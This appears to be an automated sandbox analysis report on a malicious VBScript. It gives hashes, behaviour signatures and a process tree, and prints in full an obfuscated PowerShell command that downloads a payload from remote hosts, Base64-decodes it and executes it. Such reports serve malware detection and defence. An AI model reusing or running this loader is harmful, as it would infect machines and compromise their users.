Overview

overview

10

Static

static

1

4573cff18a...bf.vbs

windows7-x64

8

4573cff18a...bf.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    134s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28-06-2024 01:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4573cff18a16eacc05034a4de1e11330c71331b15169d4249e8b04f3ab67c2bf.vbs

  • Size

    187KB

  • MD5

    a408481803f47324f6479a3b70ad763b

  • SHA1

    1a3232aeec010ce287ea65dd1a24255f95470d48

  • SHA256

    4573cff18a16eacc05034a4de1e11330c71331b15169d4249e8b04f3ab67c2bf

  • SHA512

    aab87aee34a0c93381fb0fb926edc137ffced40bba470b15dd45b798aeab9117f5a4daf30932dccef13c5c898d80f626e18a1a65d8c10b2c111319bb781f341e

  • SSDEEP

    3072:dmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZg:d08GxbKja3+DCbKCvBB/WnHXC/sLJFJN

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4573cff18a16eacc05034a4de1e11330c71331b15169d4249e8b04f3ab67c2bf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2336
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3 Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3';$Betnkelighederne = 1;Function Fellatrices($Trucing){$Farcically232=$Trucing.Length-$Betnkelighederne;$Leukocytotic64='SUBSTRIN';$Leukocytotic64+='G';For( $gracileness=1;$gracileness -lt $Farcically232;$gracileness+=2){$Alcoa+=$Trucing.$Leukocytotic64.Invoke( $gracileness, $Betnkelighederne);}$Alcoa;}function Interalar47($Weather){ . ($Terrnlbets253) ($Weather);}$talesituationens=Fellatrices ' MFo zsiKl.lNa / 5..D0. H( WSilnNd.o w sI NDT .1 0F. 0H;N TW.iTn 6h4R; Sx.6L4.;C RrAv :S1i2M1S.C0S)R BGAeTc k oA/ 2.0D1R0 0.1Y0,1 ,F iCrDeRfFo xL/H1f2S1T. 0E ';$Stilkunstnernes=Fellatrices 'FUUsleOrU-HATgTe n t ';$Frisvmmere=Fellatrices '.h,tit.pBs :./K/le.vCoTlEu xPc.o nSt.a baiFl i dnaVd.eO. c o mR.Kb.rC/pbLr,/,K osn kBuDrKr eTnTc,eCe vNn.eFn,.Fd wKpK> hWtNtIpR:B/ / 9 4v..1 5B6 . 7G9...2D1s1P/ K.oFn kCuUrBr eTnOcTe,eRvvn ePn .Od wUp ';$Constantia228=Fellatrices 'E>R ';$Terrnlbets253=Fellatrices 'TiSe xR ';$Yearock='Maney';$Smittle = Fellatrices ' eAcNh o, V%.a p pCdSa t,aw% \,RDe p,s e,tB.BKAb m. C&,&. ,ePcNhNo, At ';Interalar47 (Fellatrices 'P$UgMlPoRb aIlB:SL iPbPeBlElAi,sNts=.(ScAmId, S/ cL P$ S.m iPt tPl,e )A ');Interalar47 (Fellatrices ' $ g l oFb.a.l.:,CmiSsTt o pVh,ohr.iTc =.$ F,r.iUs.vVm mFeDrTeF. sMpsl i t,(B$ICto nVsTtAaRn tKina.2 2 8,) ');Interalar47 (Fellatrices 'p[VN e.t.. SSeKr,v iTckeSPFoOiCnSt MSaFn.a gdeSr ],:F: SAeCcIuIr.iEt ySP rLoTtEo cTo lT .=F K[ N,eUti.,SAe,c u r i tAyRPKr o t o,c opl TAy pue ]U:W: Tal s 1,2 ');$Frisvmmere=$Cistophoric[0];$Snidely= (Fellatrices ' $DgKl,o,bBa.lP: pTr.oVpNeMl lNeSrCsC=.NBeBw.-BOUb jIeGc t, SAy s tAeFm..DNEe tH.AWPePb,CLl iTe n t');$Snidely+=$Libellist[1];Interalar47 ($Snidely);Interalar47 (Fellatrices 'H$SpCrToEpde lElDeSrLsR.TH e a d eVr sB[k$ S.tUi lNk.uFnUsNt nAeNr nbeHs ],= $EtPa lKe sFiStTuSaBtBi o n eAn s ');$Hotheartedness=Fellatrices 'C$ pDr,oDpeeSlClPe,r s.. D o.w n,lSo aPdFFBiFlAeH( $UFUr.i sVvMm m eprSeE, $LFUo rSb iFs,e t,e s.)L ';$Forbisetes=$Libellist[0];Interalar47 (Fellatrices 'F$Kg lSoSb a l : I,n dVu,s.tOrBiPm.i nsi sstBrCe.nBeDs,=U(PTNe.sWt - PAaItSh. S$ F oPrObSi,s.e t.e sI). ');while (!$Industriministrenes) {Interalar47 (Fellatrices '.$ g lPo.b aMl,: b,aFgFtSa laeMr =S$GtArSu.e ') ;Interalar47 $Hotheartedness;Interalar47 (Fellatrices ' Smt.a rMtC- S lLeZeDps 4R ');Interalar47 (Fellatrices ' $ gEl o,bNaBl :PIsn d,u sVtUr i m iRn i s t r ecnEe sD= (,TRe sPtA-LPLa t h $ F oBrUbLi,s,e t,e sS)r ') ;Interalar47 (Fellatrices ' $DgNlCo bDaOlR:RE v n.e sAv.aBgv=,$ g,l,oBb,aIla:.RFegs t.aKu rSa nPtTe,rKnSe.+G+ % $EC,i swtKoUpchGo.rSiscS.NcNo,uLnLt, ') ;$Frisvmmere=$Cistophoric[$Evnesvag];}$Knallertfreren=362845;$tolkningsrammerne=26102;Interalar47 (Fellatrices 'P$,gOlCo bNa.lH: Ldy.nDgDb y,a c e a.e, U= NGRe tl-SCEoTn t.e n t. D$ FIo r bLiEs eAt e s ');Interalar47 (Fellatrices ' $Tgwl,o,bBaSl : P.e,lEoOrKi,aKn T= [RSTy sPt,ePmS. C.oSn,vIe.rSt ].:R:.F r o.mGBVa sFeC6 4 S tVrNiBn gI(A$ILAyHnVgIb y a c eCaHe ). ');Interalar47 (Fellatrices 'F$Mg l oPbOa,lO:CT j eMnTeLsAtAeWm nBd eFn eLs, =S .[RSGy.s t eemK.MT eKx.t . E,nScOo.d.i nMg,],:A:LADSRCAIUIB. G eSt S,tPrFiIn g,(a$,Pse,l oCrFiMaSn )B ');Interalar47 (Fellatrices 'M$FgSl.oSb a.l :PF o rHdBr.iAnPgNsBh a,v.e.r.eC1,8K0.= $CT.j.ePn.eSs tDeSmVn d e nUeBs .psFu bSsFt,r iAn,gB( $,K,n.aFlIl.eAr.t f,rOe.r,e n ,,$VtEoOl,kGnGiun g sBr aIm.mBe,rAn e.) ');Interalar47 $Fordringshavere180;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Repset.Kbm && echo t"
        3⤵
          PID:2604

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2736-21-0x000007FEF608E000-0x000007FEF608F000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2736-22-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
      Filesize

      2.9MB

      Download
    • memory/2736-24-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2736-26-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2736-27-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2736-25-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2736-23-0x0000000001E10000-0x0000000001E18000-memory.dmp
      Filesize

      32KB

      Download
    • memory/2736-28-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2736-29-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2736-30-0x000007FEF608E000-0x000007FEF608F000-memory.dmp
      Filesize

      4KB

      Download